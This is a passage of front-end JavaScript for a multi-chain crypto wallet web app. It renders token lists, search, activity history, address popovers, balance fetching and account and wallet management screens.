    </div>
  `));

  node.querySelector('#menu').onclick = () => openAccountMenu(node);
  node.querySelector('#acctBtn').onclick = () => goto('accounts');
  {
    const chip = node.querySelector('#addrChip');
    chip.addEventListener('mouseenter', () => openAddressPopover(chip));
    chip.addEventListener('click', (e) => {
      if (e.target.closest('.address-popover')) return; // a row/button inside the popover handles its own click
      const defChain = S.meta.defaultAddressChain;
      copyText(addressesFor(S.accountIndex)[defChain], `${defChain} address copied`);
    });
  }
  node.querySelector('#act-buy').onclick = () => toast('Buy isn\'t available yet — no fiat on-ramp is connected.');
  node.querySelector('#act-swap').onclick = () => goto('swap');
  node.querySelector('#act-send').onclick = () => { S.sendSearch = { query: '', results: [], loading: false }; goto('send'); };
  node.querySelector('#act-receive').onclick = () => { S.receiveTokenSearch = { query: '', results: [], loading: false }; goto('receive'); };
  node.querySelectorAll('.tab').forEach(b => b.onclick = () => goto('main', { tab: b.dataset.tab }));
  node.querySelector('#filter')?.addEventListener('click', () => openChainFilter(node));
  node.querySelector('#refresh')?.addEventListener('click', () => loadBalances(viewedIndex));
  node.querySelector('#addToken')?.addEventListener('click', () => goto('addToken'));
  node.querySelector('#tokenSearchInput')?.addEventListener('input', (e) => searchTokens(S.selectedChainFilter, e.target.value));
  node.querySelector('#loadMoreTokens')?.addEventListener('click', () => loadBrowseTokens(S.selectedChainFilter));
  node.querySelectorAll('.token-row').forEach(r => r.onclick = () => goto('tokenDetail', { chain: r.dataset.chain, symbol: r.dataset.symbol, name: r.dataset.name || null, contract: r.dataset.contract || null, decimals: r.dataset.decimals || null }));

  if (!Object.keys(acctBal).length && !isLoadingThisAccount) loadBalances(viewedIndex);
}

function tokenIconHtml(chain, t) {
  const initial = (t.symbol || '?')[0].toUpperCase();
  const bg = stringToColor(t.symbol || chain);
  const logo = tokenLogoUrl(chain, t);
  const chainLogo = chainLogoUrl(chain);
  const chainColor = chainIconStyle(chain);
  return `<div class="token-icon" style="background:${bg}">
    ${initial}
    ${logo ? `<img src="${logo}" class="token-icon-img" onerror="this.remove()" alt="">` : ''}
    <span class="chain-badge" style="background-color:${chainColor}">${chainLogo ? `<img src="${chainLogo}" onerror="this.remove()" alt="">` : ''}</span>
  </div>`;
}
function stringToColor(str) {
  let hash = 0; for (let i = 0; i < str.length; i++) hash = str.charCodeAt(i) + ((hash << 5) - hash);
  const h = Math.abs(hash) % 360; return `hsl(${h},60%,50%)`;
}
// Distinct, evenly-spaced hues per account index so "Account 1" and "Account 2" never look alike.
function accountColor(index) { return `hsl(${(index * 137.5 + 250) % 360},58%,52%)`; }
function escapeHtml(s) { return String(s ?? '').replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c])); }

// "USDT · [● Tron]" — the network is a labelled pill beside the symbol, so the same token on
// different networks reads as distinct rows and nothing looks like "a network with a token under it".
function netPillHtml(chain) {
  return `<span class="net-pill"><i style="background:${chainIconStyle(chain)}"></i>${escapeHtml(chain)}</span>`;
}

// Row layout used everywhere a token appears (Tokens tab, Send picker, search results):
//   [logo+badge]  SYMBOL [network pill]         $value / $price
//                 Full token name               balance / 24h change
function tokenRowHtml(t) {
  const owned = t.balance != null; // browse/search results have no `balance` field at all — owned rows always do (even "0")
  const top = owned ? (t.usd != null ? fmtUsd(t.usd) : '—') : (t.price != null ? fmtUsd(t.price) : '—');
  const bottom = owned
    ? `${fmtNum(t.balance)} ${escapeHtml(t.symbol)}`
    : (t.change24h != null ? `<span style="color:${t.change24h >= 0 ? 'var(--success)' : 'var(--danger)'}">${t.change24h >= 0 ? '+' : ''}${t.change24h.toFixed(2)}%</span>` : '');
  // Natives are labelled as such ("Ethereum · native coin") so ETH-on-Arbitrum vs ETH-on-Ethereum
  // is obviously the same coin living on two networks, not two different tokens.
  const name = !t.contract
    ? `${t.name && t.name !== t.symbol ? escapeHtml(t.name) + ' · ' : ''}native coin`
    : (t.name && t.name !== t.symbol ? escapeHtml(t.name) : tokenTypeLabel(t.chain));
  return `<div class="token-row" data-chain="${escapeHtml(t.chain)}" data-symbol="${escapeHtml(t.symbol)}" data-contract="${t.contract || ''}" data-decimals="${t.decimals ?? ''}" data-name="${escapeHtml(t.name || '')}">
    ${tokenIconHtml(t.chain, t)}
    <div class="token-main">
      <div class="token-name"><span class="sym">${escapeHtml(t.symbol)}</span>${netPillHtml(t.chain)}</div>
      <div class="token-sub" title="${escapeHtml(t.name || '')}">${name}</div>
    </div>
    <div class="token-values"><div class="token-usd">${top}</div><div class="token-amt">${bottom}</div></div>
  </div>`;
}
function tokenTypeLabel(chain) { return EVM_CHAINS[chain] ? 'ERC-20 token' : chain === 'Tron' ? 'TRC-20 token' : chain === 'Solana' ? 'SPL token' : 'Token'; }
function renderTokensTabHtml(ownedRows, isLoadingThisAccount) {
  const chain = S.selectedChainFilter;
  const filterRow = `
    <div class="filter-row mt-16">
      <button class="filter-pill" id="filter">${renderIcon('filter', 14)} ${chain}</button>
      <button class="icon-btn" id="refresh">${renderIcon('refresh')}</button>
    </div>`;

  const allNetworks = chain === 'All networks';
  const search = S.tokenSearch;
  const searching = search.chain === chain && search.query.trim().length > 0;
  const searchBox = `<div class="search-field mt-8">${renderIcon('search', 16)}<input id="tokenSearchInput" placeholder="${allNetworks ? 'Search any token, e.g. USDT' : `Search ${chain} tokens`}" value="${escapeHtml(search.query)}"></div>`;
  const ownedKey = t => `${t.chain}|${(t.contract || 'native').toLowerCase()}`;

  if (searching) {
    // Search results are merged with what you own: an owned match shows your balance, everything
    // else shows the market price. On "All networks" the same token appears once per network it
    // exists on (USDT on Ethereum, USDT on Tron, …) — each its own row with its own network pill.
    const ownedByKey = new Map(ownedRows.map(t => [ownedKey(t), t]));
    const merged = search.results.map(t => { const row = { ...t, chain: t.chain || chain }; return ownedByKey.get(ownedKey(row)) || row; });
    return `${filterRow}${searchBox}
      <div class="token-list" id="tokenList">
        ${search.loading && !merged.length ? loadingBalancesHtml('Searching…') :
          merged.length ? merged.map(tokenRowHtml).join('') : `<div class="empty-state">No tokens found matching "${escapeHtml(search.query)}"${allNetworks ? '' : ` on ${escapeHtml(chain)}`}.</div>`}
      </div>`;
  }

  if (allNetworks) {
    // No browse list across every chain (that's what the per-network filter is for) — just what
    // you own, with a search that looks across all networks at once.
    return `${filterRow}${searchBox}
      <div class="token-list" id="tokenList">
        ${isLoadingThisAccount && !ownedRows.length ? loadingBalancesHtml() :
          ownedRows.length ? ownedRows.map(tokenRowHtml).join('') : `<div class="empty-state">No tokens found on this account yet.<br>Add funds via Receive, or add a custom token below.</div>`}
      </div>
      <button class="btn-link" style="align-self:center;margin-top:10px" id="addToken">+ Add custom token</button>`;
  }

  const cache = S.browseCache[chain];
  // Kick off the first page AFTER this render finishes (never synchronously inside it — a render
  // that re-enters render() ends up mounting two shells on top of each other).
  if (!cache && !isLoadingThisAccount) setTimeout(() => { if (S.screen === 'main' && S.selectedChainFilter === chain && !S.browseCache[chain]) loadBrowseTokens(chain, { reset: true }); }, 0);
  const ownedKeys = new Set(ownedRows.map(ownedKey));
  const browseRows = (cache?.tokens || []).map(t => ({ ...t, chain })).filter(t => !ownedKeys.has(ownedKey(t)));
  const hasMore = cache && cache.offset < cache.total;

  return `${filterRow}${searchBox}
    <div class="token-list" id="tokenList">
      ${isLoadingThisAccount && !ownedRows.length ? loadingBalancesHtml() : ownedRows.map(tokenRowHtml).join('')}
      ${browseRows.length ? `<div class="list-section-label">${ownedRows.length ? 'More on' : 'Popular on'} ${escapeHtml(chain)}</div>` : ''}
      ${browseRows.map(tokenRowHtml).join('')}
      ${!cache && !isLoadingThisAccount ? loadingBalancesHtml('Loading tokens…') : ''}
      ${cache?.loading ? loadingBalancesHtml('Loading more…') : ''}
    </div>
    ${hasMore && !cache?.loading ? `<button class="btn-link" style="align-self:center;margin-top:10px" id="loadMoreTokens">Load more</button>` : ''}
    <button class="btn-link" style="align-self:center;margin-top:10px" id="addToken">+ Add custom token</button>`;
}

function loadingBalancesHtml(label = 'Loading balances…') {
  return `<div class="empty-state"><span class="spinner" style="border-color:var(--border);border-top-color:var(--text-muted)"></span><div class="mt-8">${label}</div></div>`;
}

function renderActivityHtml() {
  const mine = S.history.filter(h => (h.wallet ?? 'w1') === S.walletId && (h.account ?? 0) === S.accountIndex);
  if (!mine.length) return `<div class="empty-state">No activity yet for ${escapeHtml(accountName(S.accountIndex))}.<br>Transactions you send or swap from this wallet will show up here.</div>`;
  return `<div class="token-list">${mine.map(h => `
    <div class="list-row" style="cursor:default">
      <div class="token-icon" style="background:${h.ok ? 'var(--success)' : 'var(--danger-solid)'}">${h.kind === 'swap' ? renderIcon('swap') : h.ok ? renderIcon('send') : '!'}</div>
      <div class="token-main"><div class="token-name"><span class="sym">${escapeHtml(h.label)}</span>${netPillHtml(h.chain)}</div><div class="token-sub">${new Date(h.time).toLocaleString()}</div></div>
      <div class="token-values"><a class="btn-link" style="font-size:13px" href="${h.explorerUrl}" target="_blank" rel="noopener">View</a></div>
    </div>`).join('')}</div>`;
}

function openAccountMenu(anchorNode) {
  const menu = el(`
    <div class="account-menu">
      <div class="list-row" id="m-lock">${renderIcon('lock', 18)}<div>Lock wallet</div></div>
      <div class="list-row" id="m-reveal">${renderIcon('key', 18)}<div>Show Secret Recovery Phrase</div></div>
      <div class="list-row" id="m-settings">${renderIcon('settings', 18)}<div>Settings</div></div>
    </div>`);
  anchorNode.appendChild(menu);
  const closeOnOutside = (e) => { if (!menu.contains(e.target)) { menu.remove(); document.removeEventListener('click', closeOnOutside, true); } };
  setTimeout(() => document.addEventListener('click', closeOnOutside, true), 0);
  menu.querySelector('#m-lock').onclick = () => lockWallet();
  menu.querySelector('#m-reveal').onclick = () => goto('revealPhrase', { from: 'main' });
  menu.querySelector('#m-settings').onclick = () => goto('settings');
}

const ADDRESS_POPOVER_CHAINS = ['Ethereum', 'Bitcoin', 'Solana', 'Tron'];

function openAddressPopover(chip) {
  if (chip.querySelector('.address-popover')) return;
  const addrs = addressesFor(S.accountIndex);
  const meta = S.meta;
  const pop = el(`
    <div class="address-popover">
      ${ADDRESS_POPOVER_CHAINS.map(c => {
        const logo = chainLogoUrl(c);
        return `<div class="list-row" data-chain="${c}">
          <div class="token-icon" style="background:${chainIconStyle(c)}">${c[0]}${logo ? `<img src="${logo}" class="token-icon-img" onerror="this.remove()" alt="">` : ''}</div>
          <div class="token-main"><div class="token-name">${c}</div></div>
          <div class="mono" style="font-size:12.5px">${short(addrs[c], 6, 4)}</div>
          <button class="icon-btn" data-copy="${c}">${renderIcon('copy', 14)}</button>
        </div>`;
      }).join('')}
      <button class="btn btn-secondary btn-block" id="viewAllAddrs" style="margin:10px 0 12px">View all</button>
      <div class="row-between" style="padding:10px 4px 2px;border-top:1px solid var(--border)">
        <div>
          <div style="font-weight:600;font-size:14px">Show default address</div>
          <div class="p-muted" style="font-size:12px">Default: ${meta.defaultAddressChain} <a href="#" id="changeDefault" style="color:var(--accent);font-weight:600">Change in Settings</a></div>
        </div>
        <label class="switch"><input type="checkbox" id="showDefaultToggle" ${meta.showDefaultAddress ? 'checked' : ''}><span class="switch-track"></span></label>
      </div>
    </div>`);
  chip.appendChild(pop);

  pop.querySelectorAll('[data-copy]').forEach(btn => btn.onclick = (e) => {
    e.stopPropagation();
    const c = btn.dataset.copy;
    copyText(addrs[c], `${c} address copied`);
  });
  pop.querySelector('#viewAllAddrs').onclick = (e) => { e.stopPropagation(); pop.remove(); goto('receive'); };
  pop.querySelector('#changeDefault').onclick = (e) => { e.preventDefault(); e.stopPropagation(); pop.remove(); goto('settings'); };
  pop.querySelector('#showDefaultToggle').onclick = (e) => e.stopPropagation();
  pop.querySelector('#showDefaultToggle').onchange = (e) => {
    S.meta.showDefaultAddress = e.target.checked; saveMeta(S.meta);
    render(); // reflect the chip's own label change immediately
  };

  let closeTimer;
  const scheduleClose = () => { closeTimer = setTimeout(() => pop.remove(), 250); };
  pop.addEventListener('mouseenter', () => clearTimeout(closeTimer));
  pop.addEventListener('mouseleave', scheduleClose);
  chip.addEventListener('mouseleave', scheduleClose);
}

function openChainFilter(anchorNode) {
  const options = ['All networks', ...ALL_CHAIN_NAMES];
  const menu = el(`<div class="account-menu" style="max-height:320px;overflow-y:auto">
    ${options.map(o => `<div class="list-row" data-o="${o}">${o}</div>`).join('')}
  </div>`);
  anchorNode.appendChild(menu);
  menu.querySelectorAll('[data-o]').forEach(r => r.onclick = () => {
    S.selectedChainFilter = r.dataset.o;
    S.tokenSearch = { chain: null, query: '', results: [], loading: false }; // a search is per-network; don't carry it over
    menu.remove(); render();
  });
  const closeOnOutside = (e) => { if (!menu.contains(e.target)) { menu.remove(); document.removeEventListener('click', closeOnOutside, true); } };
  setTimeout(() => document.addEventListener('click', closeOnOutside, true), 0);
}

async function loadBalances(index = S.accountIndex, wid = S.walletId) {
  // The (wallet, account) key is captured once, up front — never re-read the active account after
  // the await below. Balance fetches for different accounts can be in flight at the same time
  // (switching accounts while one is still loading), and each must land in its OWN slot regardless
  // of what account the user is looking at by the time the network response comes back.
  if (!mnemonicFor(wid)) return;
  const key = bkey(index, wid);
  if (S.loadingIndices.has(key)) return;
  S.loadingIndices.add(key); renderIfBalanceScreen();
  try {
    const res = await fetch('/api/balances', {
      method: 'POST', headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ addresses: addressesFor(index, wid), customTokens: S.meta.customTokens || {} }),
    }).then(r => r.json());
    if (res.error) throw new Error(res.error);
    S.balances[key] = res.chains;
  } catch (e) { toast('Could not load balances — check your connection.'); }
  S.loadingIndices.delete(key); renderIfBalanceScreen();
}

// A balance fetch finishing in the background must only refresh screens that display balances.
// Re-rendering whatever happens to be open (an import textarea, the send form, a rename prompt)
// would throw away what the user has typed there.
const BALANCE_SCREENS = new Set(['main', 'send', 'accounts']);
function renderIfBalanceScreen() { if (BALANCE_SCREENS.has(S.screen)) render(); }

const BROWSE_PAGE_SIZE = 10;

async function loadBrowseTokens(chain, { reset = false } = {}) {
  const cache = S.browseCache[chain] ??= { tokens: [], offset: 0, total: 0, loading: false, dbReady: true };
  if (cache.loading) return;
  if (reset) { cache.tokens = []; cache.offset = 0; }
  cache.loading = true; render();
  try {
    const r = await fetch(`/api/tokens/top?chain=${encodeURIComponent(chain)}&offset=${cache.offset}&limit=${BROWSE_PAGE_SIZE}`).then(r => r.json());
    if (r.error) throw new Error(r.error);
    cache.tokens.push(...r.tokens);
    cache.offset += r.tokens.length;
    cache.total = r.total;
    cache.dbReady = r.dbReady;
  } catch { toast('Could not load the token list — check your connection.'); }
  cache.loading = false; render();
}

// Re-render the Tokens tab list without tearing down the whole main screen — otherwise every
// keystroke's render() would destroy and recreate the search input and drop the caret/focus.
function rerenderMainKeepingFocus() {
  const input = document.getElementById('tokenSearchInput');
  const hadFocus = input && document.activeElement === input;
  const pos = hadFocus ? input.selectionStart : null;
  render();
  if (hadFocus) { const again = document.getElementById('tokenSearchInput'); if (again) { again.focus(); try { again.setSelectionRange(pos, pos); } catch {} } }
}

let _searchDebounce = null;
function searchTokens(chain, query) {
  clearTimeout(_searchDebounce);
  S.tokenSearch.chain = chain; S.tokenSearch.query = query;
  if (!query.trim()) { S.tokenSearch.results = []; S.tokenSearch.loading = false; rerenderMainKeepingFocus(); return; }
  _searchDebounce = setTimeout(async () => {
    S.tokenSearch.loading = true; rerenderMainKeepingFocus();
    try {
      const results = chain === 'All networks'
        ? await searchAcrossAllChains(query)
        : await fetch(`/api/tokens/search?chain=${encodeURIComponent(chain)}&q=${encodeURIComponent(query)}`).then(r => r.json()).then(r => (r.tokens || []).map(t => ({ ...t, chain })));
      if (S.tokenSearch.query === query) S.tokenSearch.results = results;
    } catch { /* leave previous results in place on a transient failure */ }
    S.tokenSearch.loading = false; rerenderMainKeepingFocus();
  }, 300);
}

// Send/Receive aren't scoped to one network the way the Tokens tab is, so a search there has to
// check every chain — fired in parallel against the same (already-cached) /api/tokens/search the
// Tokens tab uses, not a new endpoint. Each chain's own results are already sorted best-match
// first (the real/famous token wins ties over random same-symbol imitators — see tokendb.js), so
// keeping only the top match per chain is deliberate: it's "the plausible real token on this
// chain," not every wrapped/vault/leveraged-ETF lookalike that happens to contain the query.
async function searchAcrossAllChains(query, limitPerChain = 1) {
  const q = query.trim().toLowerCase();
  const perChain = await Promise.all(ALL_CHAIN_NAMES.map(chain =>
    fetch(`/api/tokens/search?chain=${encodeURIComponent(chain)}&q=${encodeURIComponent(query)}`)
      .then(r => r.json()).then(r => (r.tokens || []).slice(0, limitPerChain).map(t => ({ ...t, chain }))).catch(() => [])
  ));
  // In this "one row per network" view only confident matches make sense: the symbol equals or
  // starts with what was typed, or the name starts with it. A chain whose best hit merely
  // *contains* the query somewhere in a long name (typing "sol" matching "Wrapped … (Solana)")
  // would just be noise next to the real thing.
  const rankOf = { exact: 0, symbol: 1, name: 2, partial: 3 };
  return perChain.flat()
    .filter(t => t.match !== 'partial' || q.length >= 5)
    .sort((a, b) => (rankOf[a.match] ?? 3) - (rankOf[b.match] ?? 3));
}

// `redraw` re-renders just the result list on the calling screen — a full render() here would
// rebuild the search input mid-typing and throw the user's focus away after every keystroke.
let _sendSearchDebounce = null;
function searchSendTokens(query, redraw) {
  clearTimeout(_sendSearchDebounce);
  S.sendSearch.query = query;
  if (!query.trim()) { S.sendSearch.results = []; S.sendSearch.loading = false; redraw(); return; }
  _sendSearchDebounce = setTimeout(async () => {
    S.sendSearch.loading = true; redraw();
    const results = await searchAcrossAllChains(query);
    if (S.sendSearch.query === query) S.sendSearch.results = results;
    S.sendSearch.loading = false; redraw();
  }, 300);
}

let _receiveSearchDebounce = null;
function searchReceiveTokens(query, redraw) {
  clearTimeout(_receiveSearchDebounce);
  S.receiveTokenSearch.query = query;
  if (!query.trim()) { S.receiveTokenSearch.results = []; S.receiveTokenSearch.loading = false; redraw(); return; }
  _receiveSearchDebounce = setTimeout(async () => {
    S.receiveTokenSearch.loading = true; redraw();
    const results = await searchAcrossAllChains(query);
    if (S.receiveTokenSearch.query === query) S.receiveTokenSearch.results = results;
    S.receiveTokenSearch.loading = false; redraw();
  }, 300);
}

// ══════════════════════════════════════════════════════════════════════════
//  ACCOUNTS
// ══════════════════════════════════════════════════════════════════════════
function accountTotalUsd(index, wid) {
  const bal = S.balances[bkey(index, wid)];
  if (!bal) return null;
  let total = 0;
  for (const c of Object.values(bal)) for (const t of c.tokens || []) if (t.usd) total += parseFloat(t.usd);
  return total;
}

// Fetch balances for every account that doesn't have them yet, one at a time (each account is ten
// chains' worth of RPC calls — firing all of them at once would just trip rate limits).
async function ensureAllAccountBalances() {
  for (const w of S.meta.wallets) {
    for (let i = 0; i < w.accountCount; i++) {
      const k = bkey(i, w.id);
      if (S.balances[k] || S.loadingIndices.has(k)) continue;
      if (S.screen !== 'accounts') return;
      await loadBalances(i, w.id);
    }
  }
}

// Small modal with a single text field — used for renaming accounts and wallets.
function openTextPrompt({ title, label, value, maxlength = 32, onSave }) {
  const ov = el(`<div class="overlay" style="position:fixed">
    <div class="modal" style="text-align:left">
      <h3 style="margin:0 0 12px">${escapeHtml(title)}</h3>
      <label class="label">${escapeHtml(label)}</label>
      <input class="field" id="promptInput" value="${escapeHtml(value)}" maxlength="${maxlength}" autocomplete="off">
      <div class="modal-actions mt-16" style="flex-direction:row">
        <button class="btn btn-secondary" style="flex:1" id="promptCancel">Cancel</button>
        <button class="btn btn-primary" style="flex:1" id="promptOk">Save</button>
      </div>
    </div></div>`);
  $app.appendChild(ov);
  const input = ov.querySelector('#promptInput');
  const close = () => ov.remove();
  const save = () => { const v = input.value.trim(); if (!v) { input.focus(); return; } close(); onSave(v); };
  ov.querySelector('#promptCancel').onclick = close;
  ov.querySelector('#promptOk').onclick = save;
  ov.onclick = (e) => { if (e.target === ov) close(); };
  input.addEventListener('keydown', (e) => { if (e.key === 'Enter') save(); if (e.key === 'Escape') close(); });
  setTimeout(() => { input.focus(); input.select(); }, 0);
}

// Confirmation modal (used for removing a wallet).
function openConfirmModal({ title, text, confirmLabel, danger = false, onOk }) {
  const ov = el(`<div class="overlay" style="position:fixed">
    <div class="modal" style="text-align:left">
      <h3 style="margin:0 0 8px">${escapeHtml(title)}</h3>
      <p style="margin-bottom:4px">${text}</p>
      <div class="field-hint error" id="cmErr" style="display:none"></div>
      <div class="modal-actions mt-16" style="flex-direction:row">
        <button class="btn btn-secondary" style="flex:1" id="cmCancel">Cancel</button>
        <button class="btn ${danger ? 'btn-danger' : 'btn-primary'}" style="flex:1" id="cmOk">${escapeHtml(confirmLabel)}</button>
      </div>
    </div></div>`);
  $app.appendChild(ov);
  const err = ov.querySelector('#cmErr'), ok = ov.querySelector('#cmOk');
  const close = () => ov.remove();
  const go = async () => {
    ok.disabled = true; ok.innerHTML = '<span class="spinner"></span>';
    try { await onOk(); close(); }
    catch (e) { ok.disabled = false; ok.textContent = confirmLabel; err.style.display = 'block'; err.textContent = e.message; }
  };
  ov.querySelector('#cmCancel').onclick = close;
  ok.onclick = go;
  ov.onclick = (e) => { if (e.target === ov) close(); };
  document.addEventListener('keydown', function esc(e) { if (e.key === 'Escape') { close(); document.removeEventListener('keydown', esc); } });
  setTimeout(() => ok.focus(), 0);
}

// Context menu anchored under a "⋮" button.
function openKebabMenu(anchorBtn, items) {
  document.querySelectorAll('.kebab-menu').forEach(m => m.remove());
  const menu = el(`<div class="account-menu kebab-menu">${items.map((it, i) => `<div class="list-row" data-i="${i}" ${it.danger ? 'style="color:var(--danger)"' : ''}>${it.icon ? renderIcon(it.icon, 18) : ''}<div>${escapeHtml(it.label)}</div></div>`).join('')}</div>`);
  const shell = anchorBtn.closest('.shell');
  shell.appendChild(menu);
  const a = anchorBtn.getBoundingClientRect(), s = shell.getBoundingClientRect();
  menu.style.top = `${a.bottom - s.top + 4 + shell.scrollTop}px`;
  menu.style.left = 'auto'; menu.style.right = `${s.right - a.right}px`; menu.style.width = '240px';
  menu.querySelectorAll('[data-i]').forEach(r => r.onclick = (e) => { e.stopPropagation(); menu.remove(); items[Number(r.dataset.i)].onClick(); });
  const closeOnOutside = (e) => { if (!menu.contains(e.target)) { menu.remove(); document.removeEventListener('click', closeOnOutside, true); } };
  setTimeout(() => document.addEventListener('click', closeOnOutside, true), 0);
}

function renderAccounts() {
  const ui = S.accountsUi;
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Accounts', true)}
      <div class="screen" style="padding-bottom:8px">
        <div class="search-field">${renderIcon('search', 16)}<input placeholder="Search your accounts" id="q" value="${escapeHtml(ui.query)}" autocomplete="off"></div>
        <div id="list"></div>
      </div>
      <div class="bottom-bar" style="position:sticky;bottom:0;background:var(--bg)">
        <button class="btn btn-secondary btn-block" id="addWallet">Add wallet</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('main'));
  node.querySelector('#addWallet').onclick = () => goto('addWallet');
  const list = node.querySelector('#list');

  const accountRow = (w, i) => {
    const name = accountName(i, w.id);
    const addrs = addressesFor(i, w.id);
    const isActive = w.id === S.walletId && i === S.accountIndex;
    const key = bkey(i, w.id);
    const total = accountTotalUsd(i, w.id);
    const loading = S.loadingIndices.has(key);
    const expanded = ui.expanded === key;
    const row = el(`<div class="acct-item ${isActive ? 'active' : ''}">
      <div class="acct-main">
        <div class="acct-avatar" style="background:${accountColor(i + w.id.length)}">${escapeHtml(name[0].toUpperCase())}</div>
        <div class="acct-body">
          <div class="acct-name" title="${escapeHtml(name)}">${escapeHtml(name)}${isActive ? `<span class="acct-current">Current</span>` : ''}</div>
          <div class="acct-addr-line">
            <button class="addr-toggle ${expanded ? 'open' : ''}" data-expand title="Show all network addresses">${renderIcon('chevronDown', 14)}</button>
            <span class="addr-chip-sm" data-copy="${escapeHtml(addrs.Ethereum)}" title="Copy EVM address">${short(addrs.Ethereum, 7, 4)} ${renderIcon('copy', 12)}</span>
          </div>
        </div>
        <div class="acct-usd">${total != null ? fmtUsd(total) : loading ? '<span class="p-muted">···</span>' : '<span class="p-muted">—</span>'}</div>
        <button class="kebab" data-menu title="Account options">⋮</button>
      </div>
      ${expanded ? `<div class="acct-addrs">${['Ethereum', 'Bitcoin', 'Solana', 'Tron'].map(c => `
        <div class="acct-addr-row"><span class="net-pill"><i style="background:${chainIconStyle(c)}"></i>${c === 'Ethereum' ? 'EVM networks' : c}</span><span class="mono" style="flex:1;font-size:12px">${short(addrs[c], 10, 8)}</span><button class="icon-btn" data-copy="${escapeHtml(addrs[c])}" title="Copy">${renderIcon('copy', 14)}</button></div>`).join('')}
      </div>` : ''}
    </div>`);
    row.querySelector('.acct-main').onclick = (e) => {
      if (e.target.closest('[data-copy],[data-menu],[data-expand]')) return;
      setActiveAccount(i, w.id); goto('main');
    };
    row.querySelectorAll('[data-copy]').forEach(b => b.onclick = (e) => { e.stopPropagation(); copyText(b.dataset.copy, 'Address copied'); });
    row.querySelector('[data-expand]').onclick = (e) => { e.stopPropagation(); ui.expanded = expanded ? null : key; draw(); };
    row.querySelector('[data-menu]').onclick = (e) => {
      e.stopPropagation();
      openKebabMenu(e.currentTarget, [
        { label: 'Rename account', icon: 'settings', onClick: () => openTextPrompt({ title: 'Rename account', label: 'Account name', value: name, onSave: (v) => { w.accounts[i] = v; saveMeta(S.meta); draw(); } }) },
        { label: 'Copy EVM address', icon: 'copy', onClick: () => copyText(addrs.Ethereum, 'Address copied') },
        { label: 'Show all addresses', icon: 'qr', onClick: () => { ui.expanded = key; draw(); } },
        ...(isActive ? [] : [{ label: 'Switch to this account', icon: 'check', onClick: () => { setActiveAccount(i, w.id); goto('main'); } }]),
      ]);
    };
    return row;
  };

  const walletGroup = (w) => {
    const collapsed = ui.collapsed.has(w.id);
    const q = ui.query.trim().toLowerCase();
    const indices = [...Array(w.accountCount).keys()].filter(i => !q || accountName(i, w.id).toLowerCase().includes(q) || w.name.toLowerCase().includes(q) || addressesFor(i, w.id).Ethereum.toLowerCase().includes(q));
    if (q && !indices.length) return null;
    const group = el(`<div class="wallet-group">
      <div class="wallet-head">
        <div class="wallet-title">${escapeHtml(w.name)} <span class="p-muted" style="font-weight:500;font-size:12.5px">· ${w.accountCount} account${w.accountCount === 1 ? '' : 's'}</span></div>
        <button class="kebab" data-wmenu title="Wallet options">⋮</button>
        <button class="icon-btn" data-collapse title="${collapsed ? 'Expand' : 'Collapse'}" style="transform:rotate(${collapsed ? 0 : 180}deg)">${renderIcon('chevronDown', 18)}</button>
      </div>
      <div class="wallet-body" ${collapsed ? 'hidden' : ''}></div>
    </div>`);
    const body = group.querySelector('.wallet-body');
    indices.forEach(i => body.appendChild(accountRow(w, i)));
    if (!q) {
      const add = el(`<button class="btn-link acct-add">${renderIcon('close', 16)} Add account</button>`);
      add.querySelector('svg').style.transform = 'rotate(45deg)';
      add.onclick = () => {
        const idx = w.accountCount;
        w.accounts[idx] = `Account ${idx + 1}`; w.accountCount++;
        saveMeta(S.meta);
        derivedFor(idx, w.id);
        draw();
        toast(`Account ${idx + 1} added to ${w.name}`, 2200, { success: true });
        loadBalances(idx, w.id);
      };
      body.appendChild(add);
    }
    group.querySelector('[data-collapse]').onclick = () => { collapsed ? ui.collapsed.delete(w.id) : ui.collapsed.add(w.id); draw(); };
    group.querySelector('.wallet-title').onclick = group.querySelector('[data-collapse]').onclick;
    group.querySelector('[data-wmenu]').onclick = (e) => {
      e.stopPropagation();
      openKebabMenu(e.currentTarget, [
        { label: 'Rename wallet', icon: 'settings', onClick: () => openTextPrompt({ title: 'Rename wallet', label: 'Wallet name', value: w.name, onSave: (v) => { w.name = v; saveMeta(S.meta); draw(); } }) },
        { label: 'Show Secret Recovery Phrase', icon: 'key', onClick: () => goto('revealPhrase', { walletId: w.id, from: 'accounts' }) },
        ...(S.meta.wallets.length > 1 ? [{ label: 'Remove wallet from this device', icon: 'trash', danger: true, onClick: () => removeWallet(w) }] : []),
      ]);
    };
    return group;
  };

  function draw() {
    if (!node.isConnected) return;
    list.innerHTML = '';
    let any = false;
    for (const w of S.meta.wallets) { const g = walletGroup(w); if (g) { list.appendChild(g); any = true; } }
    if (!any) list.appendChild(el(`<div class="empty-state">No accounts matching "${escapeHtml(ui.query)}".</div>`));
  }
  draw();
  node.querySelector('#q').oninput = (e) => { ui.query = e.target.value; draw(); };
  setTimeout(ensureAllAccountBalances, 0);
}

function removeWallet(w) {
  openConfirmModal({
    title: `Remove ${w.name}?`,
    text: `This removes the wallet and its ${w.accountCount} account${w.accountCount === 1 ? '' : 's'} from this device only. Funds stay on-chain — you can add it back any time with its Secret Recovery Phrase. <b>Make sure you have that phrase written down first.</b>`,
    confirmLabel: 'Remove wallet', danger: true,
    onOk: async () => {
      const next = (S.wallets || []).filter(x => x.id !== w.id);
      S.meta.wallets = S.meta.wallets.filter(m => m.id !== w.id);
      await rewriteVault(next);
      S.history = S.history.filter(h => h.wallet !== w.id); saveHistory(S.history);
      for (const k of Object.keys(S.balances)) if (k.startsWith(w.id + ':')) delete S.balances[k];
      for (const k of Object.keys(S.derived)) if (k.startsWith(w.id + ':')) delete S.derived[k];
      if (S.walletId === w.id || !walletMeta(S.walletId)) setActiveAccount(0, S.meta.wallets[0].id);
      saveMeta(S.meta);
      toast(`${w.name} removed`, 2200, { success: true });
      render();
    },
  });
}

// ══════════════════════════════════════════════════════════════════════════
//  TOKEN DETAIL
// ══════════════════════════════════════════════════════════════════════════
const CHART_DAYS = { '1D': 1, '1W': 7, '1M': 30, '3M': 90, '1Y': 365, All: 'max' };

function downsample(points, maxLen) {
  if (points.length <= maxLen) return points;
  const stride = points.length / maxLen;
  const out = [];
  for (let i = 0; i < maxLen; i++) out.push(points[Math.floor(i * stride)]);
  out.push(points[points.length - 1]);
  return out;
}

